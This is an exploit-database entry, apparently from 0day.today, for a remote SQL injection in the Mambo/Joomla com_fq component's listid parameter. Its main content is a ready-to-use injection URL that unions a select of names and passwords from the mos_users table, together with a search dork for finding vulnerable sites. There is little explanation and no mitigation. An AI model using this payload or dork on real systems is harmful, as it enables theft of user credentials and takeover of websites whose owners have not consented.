id: 2563
date: 01/29/2008
title: Mambo Component Fq (listid) Remote SQL Injection Vulnerability
author: S@BUN
cves: 

==============================================================
Mambo Component Fq (listid) Remote SQL Injection Vulnerability
==============================================================



#########################################################################
#
# joomla SQL Injection(com_fq)
#########################################################################
#
# DorKs 1 : allinurl: "com_fq"
#
########################################################################
EXPLOIT :

index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*



#  0day.today [2023-03-24]  #